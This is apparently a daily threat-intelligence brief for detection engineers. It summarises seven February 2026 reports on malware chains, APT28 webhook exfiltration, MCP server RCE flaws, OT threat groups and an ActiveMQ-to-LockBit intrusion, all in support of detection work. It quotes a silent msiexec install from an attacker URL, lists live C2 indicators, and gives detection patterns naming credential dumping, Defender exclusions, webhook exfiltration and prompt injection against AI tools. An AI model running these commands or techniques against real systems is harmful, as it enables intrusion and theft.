Cyber Threat Brief — February 24, 2026
Window: February 23–24, 2026 | Audience: Detection Engineers
TL;DR: CrowdStrike drops its annual report (29-min breakout, AI at scale), Huntress dissects a ClickFix → Matanbuchus 3.0 → AstarionRAT pre-ransomware chain with 40-min DC compromise, Silver Fox abuses fake Huorong AV to drop ValleyRAT via DLL sideloading, APT28 weaponizes webhook URLs as Office macro C2, seven MCP servers get RCE CVEs from the same eval()/exec() root cause, Dragos names three new OT threat groups plus 3,300 industrial ransomware victims, and DFIR Report details an ActiveMQ exploit leading to LockBit deployment with a 90-minute final detection window.
1. CrowdStrike 2026 Global Threat Report: AI Is Both Weapon and Target
What’s New
CrowdStrike released its 2026 Global Threat Report today, tracking 280+ named adversaries in 2025. The headline numbers: eCrime average breakout time crashed to 29 minutes (fastest observed: 27 seconds), AI-enabled adversary activity surged 89% year-over-year, and 42% of vulnerabilities were weaponized before public disclosure.
Technical Details
| Field | Value |
|---|
| Adversaries tracked | 280+ named |
| Avg. eCrime breakout | 29 min (65% faster than 2024) |
| Fastest breakout | 27 seconds |
| Earliest exfil observed | 4 min post-access |
| AI-enabled activity increase | +89% YoY |
| Zero-days exploited pre-disclosure | 42% of total vulns |
| Cloud intrusions | +37% (state-nexus +266%) |
| China-nexus activity | +38%; logistics +85% |
| DPRK incidents | +130% (FAMOUS CHOLLIMA doubled) |
| Largest single heist | $1.46B crypto theft (PRESSURE CHOLLIMA) |
TTPs (Key Themes)
| Tactic | Technique | Observable |
|---|
| Initial Access | T1566 – Phishing | Prompt injection into GenAI tools at 90+ orgs |
| Credential Access | T1110 – Brute Force | AI-generated scripts for credential dumping |
| Defense Evasion | T1070 – Indicator Removal | AI erasing forensic evidence (PUNK SPIDER) |
| Command & Control | T1071 – App Layer Proto | Malicious prompts via GenAI as C2 channel |
| Impact | T1486 – Data Encrypted | Pre-positioned cloud access → ransomware |
Detection Opportunities
- Prompt Injection: Monitor GenAI tool audit logs for anomalous system prompts requesting credential output or command execution
- AI Dev Platform Abuse: Baseline API usage from AI development tooling; alert on persistence mechanisms (scheduled tasks, cron) created from AI agent processes
- Sub-27-Second Breakout: Tune lateral movement detection for initial-to-pivot under 60 seconds; traditional 5-minute correlation windows miss this
- Cloud Targeting: Alert on new cross-cloud IAM role assumptions, especially by identities that haven’t previously accessed target accounts
Log Sources
- GenAI platform audit logs (OpenAI, Gemini, Copilot Enterprise)
- Cloud provider IAM event logs (CloudTrail, Azure Monitor, GCP Audit)
- EDR telemetry for sub-2-minute process chains
- Network: anomalous TLS connections from AI service processes
Detection Coverage
| Source | Status |
|---|
| Sigma | ❌ Gap — no GenAI abuse or 27-sec breakout rules |
| Splunk ESCU | ❌ Gap |
| Elastic | ✅ Partial — defense_evasion_genai_process_encoding_prior_to_network_activity.toml + 3 related GenAI rules |
Recommendation: Review Elastic’s GenAI detection rules as a starting baseline. AI platform audit logging is the critical gap — most orgs have it unconfigured.
Sources
2. ClickFix + Matanbuchus 3.0 + AstarionRAT: Pre-Ransomware Loader Chain
What’s New
Huntress documented a February 2026 intrusion where ClickFix delivered Matanbuchus 3.0 (a $10K–$15K/month MaaS loader), which staged a never-before-documented RAT (AstarionRAT) before the operator moved laterally to both domain controllers in under 40 minutes. This is the most technically detailed ClickFix-to-ransomware-precursor chain publicly documented to date, revealing 6+ layered stages.
Technical Details
| Field | Value |
|---|
| Initial vector | ClickFix social engineering |
| First stage | Silent MSI install (-PaCkAGe hxxp://binclloudapp[.]com/466943 /q) |
| Case mixing evasion | mSiexeC.EXe — mixed case to evade string-match rules |
| Loader | Matanbuchus 3.0 (complete rewrite; $10K/mo HTTPS, $15K/mo DNS) |
| Second RAT | AstarionRAT — 24 commands, RSA C2, SOCKS5, reflective loading |
| DLL Sideloading via | Zillya! Antivirus AVCore.exe → SystemStatus.dll (Matanbuchus) |
| Staging dir | C:\ProgramData\USOShared\ (mimics Windows Update) |
| Lateral movement | PsExec to 2 DCs within 40 min; rogue account creation |
| Defender evasion | Defender exclusions staged pre-movement |
| C2 masquerade | RSA-encrypted traffic disguised as application telemetry |
| Key IOCs | binclloudapp[.]com (reg. Feb 5), IP 192.121.23[.]146 (M247 EU AS9009) |
TTPs
| Tactic | Technique | Observable |
|---|
| Initial Access | T1204.002 – User Execution: Malicious File | ClickFix clipboard paste → msiexec |
| Defense Evasion | T1036 – Masquerading | Mixed-case mSiexeC.EXe in command line |
| Defense Evasion | T1574.002 – DLL Side-Loading | AVCore.exe loads malicious SystemStatus.dll |
| Defense Evasion | T1562.001 – Disable/Modify Tools | Defender exclusion added for process + dir |
| Persistence | T1053.005 – Scheduled Task | Pre-staged in C:\ProgramData\USOShared\ |
| Credential Access | T1003 – OS Credential Dumping | AstarionRAT credential theft module |
| Lateral Movement | T1021.001 – RDP / T1569.002 – PsExec | Lateral to domain controllers |
| C2 | T1095 – Non-Application Layer Protocol | Custom Lua 5.4.7 interpreter + reflective PE loader |
Detection Opportunities
# Detect mixed-case msiexec (case-insensitive matching)
CommandLine|re: '(?i)ms[Ii][Ee][Xx][Ee][Cc].*(/|\\-)[Pp][Aa][Cc][Kk][Aa][Gg][Ee]'
# Detect silent MSI install from new/untrusted domain
process.name = "msiexec.exe" AND
CommandLine CONTAINS "/q" AND
CommandLine MATCHES "hxxp://" AND
NOT (domain IN known_software_update_domains)
# Defender exclusion staging before lateral movement
process.name IN ("powershell.exe", "cmd.exe") AND
CommandLine CONTAINS ("Add-MpPreference" OR "Set-MpPreference") AND
CommandLine CONTAINS ("-ExclusionPath" OR "-ExclusionProcess") AND
NOT parent.name = "svchost.exe"
# AstarionRAT C2 - RSA-encrypted traffic disguised as telemetry
# Hunt for non-browser processes with high-entropy TLS to newly registered domains
# PsExec to multiple targets within 40 minutes
parent.name = "psexec.exe" AND
dest.is_domain_controller = true AND
count(unique dest) >= 2 WITHIN 40min
# USOShared staging directory abuse
file.path CONTAINS "C:\\ProgramData\\USOShared\\" AND
file.extension IN (".dll", ".exe") AND
NOT process.name IN ("usocoreworker.exe", "musnotification.exe")
Log Sources
- Sysmon Events 1 (process creation), 7 (image load), 11 (file create), 12/13 (registry)
- Windows Security Event 4688 (process creation with command line)
- EDR telemetry (command-line visibility critical)
- Network: TLS fingerprinting for non-standard JA3 from
msiexec.exe
Detection Coverage
| Source | Status |
|---|
| Sigma | ✅ ClickFix: proc_creation_win_susp_clickfix_filefix_execution.yml |
| Sigma | ✅ MSI network: net_connection_win_msiexec_http.yml |
| Sigma | ✅ DLL sideloading: image_load_side_load_from_non_system_location.yml |
| Sigma | ✅ PsExec: 36 existing rules |
| Sigma | ❌ Gap: Matanbuchus 3.0 loader specifics |
| Sigma | ❌ Gap: AstarionRAT C2 pattern (RSA telemetry masquerade) |
| Sigma | ❌ Gap: USOShared staging directory abuse |
| Splunk ESCU | ❌ Gap: Matanbuchus/AstarionRAT |
| Elastic | ❌ Gap |
Write this rule: Sigma for USOShared directory PE drops from non-Windows-Update processes. Also: msiexec mixed-case detection.
Sources
3. Silver Fox APT: Fake Huorong AV Site Delivers ValleyRAT/Winos4.0 via DLL Sideloading
What’s New
Silver Fox APT (Chinese-speaking) cloned the popular Huorong Security (火绒) antivirus website — registered huoronga[.]com — to deliver ValleyRAT, a modular RAT built on the Winos4.0 framework. Malwarebytes disclosed the full technical chain today. Key detection angle: WavesSvc64.exe with no audio stack loaded, scheduled task named “Batteries,” and Winos4.0 C2 at 161.248.87.250:443 using a custom non-TLS binary protocol.
Technical Details
| Field | Value |
|---|
| Attribution | Silver Fox APT (Chinese-speaking) |
| Delivery | Typosquatted site huoronga[.]com |
| Relay domain | hndqiuebgibuiwqdhr[.]cyou |
| Payload host | Cloudflare R2 (trusted CDN) |
| Archive | BR火绒445.zip |
| Installer type | NSIS (Nullsoft) — legitimate framework |
| Loader binary | WavesSvc64.exe (audio service masquerade) |
| DLL sideloaded | DuiLib_u.dll (hijacked DirectUI library) |
| Encrypted shellcode | box.ini |
| Persistence | Scheduled task “Batteries” (C:\Windows\Tasks\Batteries.job) |
| Registry C2 config | HKCU\SOFTWARE\IpDates_info (encoded domain) |
| C2 | yandibaiji0203[.]com + 161.248.87.250:443 (custom binary proto) |
| Defender bypass | PowerShell Add-MpPreference high-integrity exclusion for %APPDATA%\trvePath + WavesSvc64.exe |
| File refresh | Periodic delete-rewrite of DLLs to defeat hash-based detection |
TTPs
| Tactic | Technique | Observable |
|---|
| Initial Access | T1192 – Spearphishing Link / T1036 – Masquerade | Typosquatted AV download site |
| Execution | T1204.002 – User Execution | NSIS installer mimics legitimate AV setup |
| Defense Evasion | T1574.002 – DLL Side-Loading | WavesSvc64.exe + DuiLib_u.dll in Temp |
| Defense Evasion | T1562.001 – Impair Defenses | High-integrity PowerShell Defender exclusion |
| Persistence | T1053.005 – Scheduled Task | Batteries.job at system startup |
| Persistence | T1547.001 – Registry Run Key | HKCU\SOFTWARE\IpDates_info C2 config |
| C2 | T1095 – Non-Standard Protocol | Custom binary over TCP/443 (not HTTPS) |
| Defense Evasion | T1070.004 – File Deletion | Periodic core file deletion + rewrite |
Detection Opportunities
# WavesSvc64.exe spawned from non-Waves parent (abnormal)
process.name = "WavesSvc64.exe" AND
NOT (parent.name IN ("services.exe", "svchost.exe") OR
file.path CONTAINS "Waves")
# rundll32.exe launched with no DLL,Export arguments
process.name = "rundll32.exe" AND
(CommandLine = "rundll32.exe" OR CommandLine = "rundll32")
# → ValleyRAT WinosStager plugin loading pattern
# Scheduled task named "Batteries" created by non-system process
EventID = 4698 AND
TaskName CONTAINS "Batteries" AND
NOT process.name IN ("svchost.exe", "taskeng.exe")
# IpDates_info registry key creation
TargetObject CONTAINS "IpDates_info"
# Defender exclusion from high-integrity non-system process
process.name IN ("powershell.exe") AND
CommandLine CONTAINS "Add-MpPreference" AND
IntegrityLevel = "High" AND
NOT (parent.name IN ("msiexec.exe", "setup.exe") AND
CodeSignature.Trusted = true)
# Heuristic: download ZIP from Cloudflare R2 → immediate NSIS extract → Waves audio binary
# Correlate: browser download → temp zip → WavesSvc64.exe in Temp within 60s
Log Sources
- Sysmon Event 1 (process creation with command line)
- Sysmon Event 12/13 (registry set —
IpDates_info)
- Sysmon Event 11 (file creation in
%TEMP%)
- Windows Security 4698 (scheduled task created)
- Network: DNS for
yandibaiji0203[.]com; TCP to 161.248.87.250:443 with non-TLS ClientHello
Detection Coverage
| Source | Status |
|---|
| Sigma | ✅ DLL sideloading: image_load_side_load_from_non_system_location.yml |
| Sigma | ✅ Defender exclusion: multiple existing rules |
| Sigma | ✅ rundll32 no args: proc_creation_win_susp_bad_opsec_sacrificial_processes.yml |
| Sigma | ❌ Gap: ValleyRAT / Winos4.0 specific indicators |
| Sigma | ❌ Gap: Batteries.job scheduled task name |
| Sigma | ❌ Gap: IpDates_info registry key |
| Sigma | ❌ Gap: WavesSvc64.exe execution from non-Waves path |
| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
High-value rule to write: Sigma for rundll32.exe with no arguments (ValleyRAT WinosStager injection pattern). Also: scheduled task name blocklist including “Batteries.”
Sources
4. APT28 Operation MacroMaze: Webhook URLs as Office Macro C2
What’s New
S2 Grupo’s LAB52 published an analysis of APT28’s “Operation MacroMaze” — a September 2025–January 2026 campaign targeting Western and Central European organizations using Office macros that POST data to legitimate webhook service URLs (Discord, Teams, workflow automation platforms) instead of attacker-controlled IPs. This bypasses IP reputation firewalls and forces defenders to look for behavioral signals: Office applications making outbound HTTP POST requests to webhook infrastructure.
Technical Details
| Field | Value |
|---|
| Attribution | APT28 (Fancy Bear / FANCY BEAR / Sofacy) |
| Campaign name | Operation MacroMaze |
| Activity period | September 2025 – January 2026 |
| Targets | Western and Central European entities |
| Initial vector | Spear phishing with weaponized Office docs (policy docs, invoices) |
| Macro action | VBA macro constructs HTTP POST to webhook URL |
| C2 channel | Legitimate webhook services (Discord webhooks, Teams incoming webhooks, automation platforms) |
| Data exfiltrated | System info, credentials — encoded in webhook payload body |
| Defense bypass | Traffic to legitimate domain IPs; no known-bad destination |
| Tooling | Standard Windows utilities + scripting — low footprint |
TTPs
| Tactic | Technique | Observable |
|---|
| Initial Access | T1566.001 – Spearphishing Attachment | Office doc with VBA macro |
| Execution | T1204.002 – User Execution | User enables macro / MOTW bypassed |
| Execution | T1059.005 – Visual Basic | VBA macro constructs HTTP POST |
| Collection | T1119 – Automated Collection | System info, credential harvest |
| Exfiltration | T1041 – Exfiltration Over C2 | HTTP POST to webhook URL (encoded body) |
| C2 | T1102.002 – Bidirectional Communication via Web Service | Webhook receive instructions + exfil |
Detection Opportunities
# Office process making outbound HTTP/HTTPS POST to non-Microsoft domains
process.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE") AND
event.type = "network_connection" AND
DestinationPort IN (80, 443) AND
NOT (DestinationHostname ENDSWITH ".microsoft.com" OR
DestinationHostname ENDSWITH ".office.com" OR
DestinationHostname ENDSWITH ".office365.com")
# Known webhook provider domains accessed from Office apps
DestinationHostname IN (
"discord.com", "discordapp.com",
"webhook.site", "hooks.zapier.com",
"webhook.office.com", ← Note: legitimate but abused
"pipedream.net", "make.com"
) AND
process.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE")
# VBA spawning child processes (ASR: Block Office apps from creating child processes)
parent.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE") AND
child.name IN ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# Encoded POST body heuristic
# Hunt for Base64-encoded strings in HTTP POST bodies from Office processes
# via proxy/web gateway inspection
KQL (Sentinel/Defender):
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE")
| where RemotePort in (80, 443)
| where RemoteUrl !contains "microsoft" and RemoteUrl !contains "office365"
| where RemoteUrl !contains "office.com"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
Log Sources
- Office 365 audit logs (macro execution events)
- Proxy/web gateway (HTTP POST from Office processes)
- Sysmon Event 3 (network connection from Office binaries)
- Windows Security Event 4688 (child processes spawned by Office)
- Defender ASR rule telemetry
Detection Coverage
| Source | Status |
|---|
| Sigma | ✅ Partial — Office spawning child processes (multiple rules) |
| Sigma | ❌ Gap: Webhook domain outbound from Office process (specific webhook providers) |
| Splunk ESCU | ✅ Partial — Office macro network connection detection |
| Elastic | ❌ Gap: Webhook-specific Office C2 pattern |
Write this: Sigma rule for outbound connections to known webhook domains (Discord, webhook.site, Zapier) from Office application processes. This is a high-fidelity detection for this TTP.
Sources
What’s New
Seven CVEs were published in February 2026 for MCP (Model Context Protocol) servers — all with the same root cause: user-controlled input reaching eval(), exec(), or equivalent dangerous functions without sanitization. Most servers are unauthenticated and network-exposed. The researcher (kai_security_ai) maintains a dataset of 554 network-exposed MCP servers, of which 37% have no authentication. This is the beginning of a disclosure wave, not the peak.
Technical Details
| CVE | Server | Vulnerable Function | Root Cause |
|---|
| CVE-2026-0755 | gemini-mcp-tool | execAsync | Shell metacharacter injection |
| CVE-2026-1977 | mcp-vegalite-server | eval(vegalite_specification) | Python eval on user input |
| CVE-2026-2008 | fermat-mcp | eqn_chart equations | Python eval on equation strings |
| CVE-2026-2131 | HarmonyOS-mcp-server | input_text | OS command injection |
| CVE-2026-2178 | xcode-mcp-server | run_lldb | Command injection in debugger |
| CVE-2026-25546 | godot-mcp | executeOperation projectPath | exec() with unsanitized path |
| CVE-2026-26029 | sf-mcp-server | child_process.exec | Shell injection in Salesforce MCP |
Attack chain: Prompt injection → MCP tool call → RCE on server host
Auth status: All unauthenticated or low-privilege at time of disclosure
Patch status: Most without patches at time of disclosure
Dataset: 554 network-exposed MCP servers; 37% no auth; ~15% have shell/exec tools
TTPs
| Tactic | Technique | Observable |
|---|
| Initial Access | T1190 – Exploit Public-Facing App | Unauthenticated MCP tool call |
| Execution | T1059 – Command and Scripting | OS command via eval/exec injection |
| Collection | T1119 – Automated Collection | AI agent data via compromised MCP server |
| Lateral Movement | T1021 – Remote Services | MCP server as pivot point in agent environment |
Detection Opportunities
# Network: MCP server processes making unexpected outbound connections
# (MCP servers should only respond, not initiate)
process.name IN ("node", "python", "python3") AND
event.type = "outbound_network" AND
DestinationPort NOT IN (443, 80) AND
NOT DestinationHostname IN (known_mcp_endpoints)
# Shell metacharacter patterns in MCP tool arguments
# Look for: ; | & ` $() in tool call parameters logged by MCP framework
# This requires MCP server-level audit logging (currently rare)
# Behavioral: unexpected child process from MCP server process
parent.name IN ("node", "python3") AND
parent.cmdline CONTAINS ("mcp", "server") AND
child.name IN ("sh", "bash", "cmd.exe", "powershell.exe", "curl", "wget")
# File system: unexpected writes from AI agent process
process.name IN ("node", "python3") AND
event.type = "file_create" AND
file.path NOT IN (mcp_server_working_dirs)
Audit step: Run the following to enumerate MCP servers in your environment:
# Find network-exposed MCP servers
ss -tlnp | grep -E ':(3000|8080|8000|9000)' | grep node
ps aux | grep -i "mcp\|model.context"
# Check for no-auth MCP servers
curl -s http://localhost:3000/mcp/health 2>/dev/null
Log Sources
- Process creation logs (parent-child chains from node/python)
- Network connection logs (unexpected egress from MCP server processes)
- MCP server audit logs (if configured — most aren’t)
- Application logs for eval()/exec() call patterns
Detection Coverage
| Source | Status |
|---|
| Sigma | ❌ Gap — No MCP-specific detection rules exist |
| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
| Elastic | ✅ Partial — defense_evasion_genai_process_compiling_executables.toml covers related GenAI abuse |
Critical gap: Zero detection coverage for MCP server exploitation. First priority: enumerate all MCP servers running in your environment, then build behavioral rules for unexpected child processes from node/python MCP processes.
Sources
6. Dragos 2026 OT/ICS Year in Review: 3 New Threat Groups, Industrial Ransomware +49%
What’s New
Dragos released its 9th Annual OT Cybersecurity Year in Review, introducing three new threat groups (AZURITE, PYROXENE, SYLVANITE), documenting KAMACITE expanding U.S. reconnaissance operations, and confirming 3,300 industrial organizations hit by ransomware in 2025 — a 49% year-over-year increase. ELECTRUM struck Polish wind/solar in December 2025. PYROXENE deployed wiper malware against Israeli critical infrastructure during regional conflict.
Technical Details
| Field | Value |
|---|
| Ransomware groups targeting OT | 119 (up from 80 in 2024) |
| Industrial org victims | 3,300 (up from 1,693 in 2024) |
| Top targeted sector | Manufacturing (>2/3 of victims) |
| New threat groups | AZURITE, PYROXENE, SYLVANITE |
| KAMACITE | U.S. ICS reconnaissance (HMIs, VFDs, meters) March–July 2025 |
| ELECTRUM | Polish distributed energy attack (wind/solar) December 2025 |
| PYROXENE | Multi-year supply chain via fake LinkedIn; wiper deployed June 2025 vs. Israel |
| SYLVANITE | Initial access provider; hands access to VOLTZITE for Stage 2 |
| VOLTZITE | Stage 2 — OT workstation compromise, config file exfil |
| AZURITE | Engineering workstation attacks; weaponizes public PoC code |
| Vuln requiring immediate action | 3% (“Now”) |
| Vuln addressable via compensating controls | 71% (“Next”) |
| OT vulns requiring no remediation | 27% (“Never”) |
New Threat Groups
| Group | Focus | Key TTP |
|---|
| AZURITE | Engineering workstations | Rapid PoC weaponization; exfils alarm data + configs |
| PYROXENE | Supply chain → OT (IRGC-affiliated) | Fake LinkedIn recruiters targeting OT operators; wiper activation |
| SYLVANITE | Initial access provider | Edge device vuln exploitation; hands off to VOLTZITE |
TTPs
| Tactic | Technique | Observable |
|---|
| Reconnaissance | T1591 – Gather Victim Org Info | Fake LinkedIn profiles targeting ICS operators |
| Initial Access | T1190 – Exploit Public-Facing App | Edge device exploitation (SYLVANITE) |
| Collection | T1005 – Data from Local System | Engineering workstation config + alarm data exfil |
| Impact | T1485 – Data Destruction | Custom wiper malware (PYROXENE, BAUXITE) |
| Impact | T1486 – Data Encrypted for Impact | ESXi ransomware affecting OT-hosted SCADA |
Detection Opportunities
# Misclassification prevention: detect Windows Server running SCADA software
# (these get hit as "IT incidents" but are OT)
# Look for: historian software, SCADA HMI processes on "IT" servers
process.name IN ("iFIX.exe", "Wonderware*.exe", "RSLinx*.exe", "FactoryTalk*.exe",
"Ignition-gateway.exe", "wincc*.exe") AND
host.role = "server"
# AZURITE pattern: rapid PoC code execution on engineering workstations
# Alert on public exploit frameworks on HMI/EWS hosts
process.name IN ("python.exe", "python3", "ruby", "go") AND
CommandLine CONTAINS ("exploit", "payload", "shellcode") AND
host.type IN ("engineering_workstation", "HMI")
# Ransomware targeting ESXi hosting OT apps
# Look for ESXi encryption of datastores containing OT VM names
vm.name MATCHES ("SCADA", "Historian", "HMI", "PLC_Gateway", "DCS") AND
event.type = "file_encrypt"
# LinkedIn phishing targeting OT operators (email gateway)
# Sender domain pattern: LinkedIn typosquats, recruitment lures
email.subject MATCHES ("opportunity", "position", "role", "engineer") AND
attachment.type IN (".docx", ".pdf") AND
recipient.department IN ("operations", "control_systems", "engineering")
Log Sources
- ICS/OT endpoint logs (Windows on engineering workstations, HMIs)
- ESXi hypervisor logs (datastore access, VM encryption events)
- Email gateway (LinkedIn-themed phishing detection)
- Network: OT zone segmentation logs, inter-zone traffic
Detection Coverage
| Source | Status |
|---|
| Sigma | ❌ Gap — No rules for KAMACITE/ELECTRUM/PYROXENE/AZURITE/SYLVANITE |
| Sigma | ❌ Gap — No engineering workstation SCADA process anomaly rules |
| Splunk ESCU | ❌ Gap for new groups |
| Elastic | ❌ Gap |
Key insight: Most industrial ransomware incidents are being mislabeled “IT incidents” when ESXi hosts running SCADA/historian software are encrypted. Ensure your detection taxonomy includes SCADA application presence as an OT severity amplifier.
Sources
7. DFIR Report: Apache ActiveMQ CVE-2023-46604 → LockBit (90-Minute Detection Window)
What’s New
The DFIR Report published a detailed intrusion case study of a February 2024 incident where CVE-2023-46604 (Apache ActiveMQ ClassInfo RCE) was exploited twice on the same unpatched server — 18 days apart — ultimately delivering LockBit ransomware via RDP. Critical finding for detection engineers: if an org only detected the second intrusion, they had under 90 minutes before ransomware execution. The intrusion chain (Metasploit → GetSystem → LSASS → lateral movement → AnyDesk → LockBit) is fully documented with timing.
Technical Details
| Field | Value |
|---|
| CVE | CVE-2023-46604 (Apache ActiveMQ ClassInfo RCE) |
| CVSS | 10.0 |
| Exploit method | Java Spring class + malicious XML via CertUtil download |
| Initial payload | Metasploit stager |
| Post-exploit 1 | GetSystem → LSASS dump → lateral movement |
| Re-access (18 days later) | Same unpatched server, same C2 |
| Time to ransomware (TTR) | 419 hours (from first access) |
| TTR (if second intrusion only) | < 90 minutes |
| Lateral movement | Remote service execution + RDP |
| Exfil + persistence | AnyDesk installed on beachhead |
| Discovery | Advanced IP Scanner (renamed binary) |
| Ransomware delivery | LockBit dropped to Downloads folder + double-click execution |
| Ransomware variant | LockBit builder (modified ransom note, Session messaging for C2) |
Intrusion Timeline
Day 0: CVE-2023-46604 exploit → CertUtil download → Metasploit stager
Day 0 +40min: GetSystem → LSASS access → SMB scanning → lateral movement
Day 1: Discovery commands → threat actor loses access
Day 18: Same exploit → re-enter same server → LSASS → domain admin check
Day 18 +20min: Lateral movement to DCs via remote services
Day 18 +20min: RDP to backup server, file server
Day 18 +60min: AnyDesk install, renamed IP Scanner, LockBit dropped
Day 18 +120min: LockBit execution across environment via RDP
TTPs
| Tactic | Technique | Observable |
|---|
| Initial Access | T1190 – Exploit Public-Facing App | CVE-2023-46604 Java deserialization |
| Execution | T1059 – Command & Scripting | CertUtil downloading payload from remote server |
| Privilege Escalation | T1068 – Exploit Vuln | GetSystem via Metasploit |
| Credential Access | T1003.001 – LSASS Memory | LSASS accessed by Metasploit process |
| Discovery | T1046 – Network Service Scan | Renamed Advanced IP Scanner |
| Lateral Movement | T1021.001 – RDP | RDP with harvested domain admin creds |
| Lateral Movement | T1569.002 – Service Execution | Remote service for Metasploit payload |
| Persistence | T1219 – Remote Access Tools | AnyDesk installed on beachhead |
| Impact | T1486 – Data Encrypted | LockBit deployed via double-click on RDP session |
Detection Opportunities
# CVE-2023-46604: CertUtil downloading Java/XML payload
process.name = "certutil.exe" AND
CommandLine CONTAINS ("-urlcache" OR "-f") AND
(CommandLine CONTAINS ".class" OR CommandLine CONTAINS ".xml") AND
parent.name = "java.exe"
# Metasploit GetSystem patterns
# Multiple privilege escalation techniques; look for:
process.name IN ("cmd.exe", "powershell.exe") AND
parent.integrity_level = "Medium" AND
child.integrity_level = "System" AND
CommandLine CONTAINS "whoami /priv"
# LSASS access by non-credential manager processes
event.type = "process_access" AND
target.name = "lsass.exe" AND
NOT process.name IN ("lsass.exe", "svchost.exe", "csrss.exe",
"wininit.exe", "winlogon.exe", "taskmgr.exe")
# Renamed Advanced IP Scanner (discovery tool masquerade)
# Hash check or PE export name vs filename mismatch
OriginalFilename = "Advanced IP Scanner" AND
process.name NOT IN ("Advanced_IP_Scanner.exe", "advanced_ip_scanner.exe")
# AnyDesk installation from unusual parent
process.name = "anydesk.exe" AND
parent.name NOT IN ("explorer.exe", "msiexec.exe") AND
event.type = "process_create"
# LockBit dropped to user Downloads
file.path CONTAINS "\\Downloads\\" AND
file.extension IN (".exe") AND
sha256 NOT IN (known_clean_hashes) AND
process.name = "explorer.exe" # double-click execution
Log Sources
- Sysmon Events 1 (process create + command line), 10 (process access — LSASS)
- Windows Security Event 4688 (process creation)
- ActiveMQ logs (Java exception traces indicating ClassInfo deserialization)
- Network: Java process outbound connections; CertUtil outbound HTTP
- RDP logs (Event 4624 Type 10 — remote logon)
Detection Coverage
| Source | Status |
|---|
| Sigma | ✅ LSASS access: multiple existing rules |
| Sigma | ✅ CertUtil download: proc_creation_win_certutil_download.yml |
| Sigma | ✅ PsExec lateral movement: 36 rules |
| Sigma | ❌ Gap: CVE-2023-46604 Java ClassInfo exploit pattern |
| Sigma | ❌ Gap: ActiveMQ-specific exploit chain |
| Sigma | ✅ AnyDesk: existing remote tool detection rules |
| Splunk ESCU | ✅ LSASS, CertUtil detections exist |
| Elastic | ✅ LSASS, remote tool, credential dumping rules |
| Elastic | ❌ Gap: ActiveMQ-specific exploit detection |
Key takeaway: If your org still has internet-exposed Apache ActiveMQ instances, patch CVE-2023-46604 immediately — it remains actively weaponized. The 90-minute window for detection on re-entry makes LSASS alerting and lateral movement detection non-negotiable.
Sources
Detection Priority Summary
| Priority | Threat | Key Gap |
|---|
| 🔴 Critical | ClickFix + Matanbuchus 3.0 + AstarionRAT | USOShared staging, mixed-case msiexec, AstarionRAT C2 |
| 🔴 Critical | Seven MCP Server RCEs | Zero coverage — audit your MCP attack surface NOW |
| 🔴 Critical | Silver Fox / ValleyRAT | rundll32 no-args, Batteries task, IpDates_info key |
| 🟠 High | APT28 Operation MacroMaze | Webhook domains from Office process (write this rule) |
| 🟠 High | ActiveMQ → LockBit | ActiveMQ ClassInfo exploit chain (still in wild) |
| 🟡 Medium | Dragos OT Report | OT mislabeling; AZURITE/PYROXENE no coverage |
| 🟢 Intel | CrowdStrike 2026 GTR | Review AI platform audit logging gaps |
Coverage Index Updates
Topics added today:
- CrowdStrike 2026 Global Threat Report (Feb 24)
- Silver Fox APT / Fake Huorong / ValleyRAT (Feb 24)
- APT28 Operation MacroMaze (Feb 24)
- Seven MCP Server RCEs / eval() epidemic (Feb 24)
- ClickFix + Matanbuchus 3.0 + AstarionRAT (Feb 23)
- Dragos 2026 OT/ICS Year in Review / AZURITE/PYROXENE/SYLVANITE (Feb 23)
- DFIR Report: Apache ActiveMQ CVE-2023-46604 → LockBit (Feb 23)